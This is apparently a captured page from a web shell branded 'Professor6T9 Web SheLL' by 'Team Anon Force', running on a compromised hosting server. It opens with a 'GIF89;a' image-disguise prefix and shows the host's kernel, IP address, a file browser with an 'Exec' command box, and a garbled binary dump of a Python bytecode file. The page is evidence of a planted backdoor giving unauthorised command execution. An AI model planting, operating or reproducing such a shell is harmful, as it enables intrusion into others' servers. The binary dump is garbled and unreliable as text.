GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium22.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
68.65.122.106
/
opt
/
alt
/
python36
/
lib64
/
python3.6
/
lib2to3
/
pgen2
/
__pycache__
[ HOME ]
Exec
Submit
literals.cpython-36.opt-1.pyc
3 � fO � @ sP d Z ddlZddddddd d ddd � Zdd� Zdd� Zdd� ZedkrLe� dS )z<Safely evaluate Python string literals without using eval().� N���� � � ��'�"�\) �a�b�f�n�r�t�vr r r c C s� | j dd�\}}tj|�}|d k r&|S |jd�r�|dd � }t|�dk rTtd| ��yt|d�}W q� tk r� td| ��Y q�X n0yt|d�}W n tk r� td| ��Y nX t|�S ) Nr � �x� z!invalid hex string escape ('\%s')� � z#invalid octal string escape ('\%s'))�group�simple_escapes�get� startswith�len� ValueError�int�chr)�m�all�tail�escZhexes�i� r% �;/opt/alt/python36/lib64/python3.6/lib2to3/pgen2/literals.py�escape s"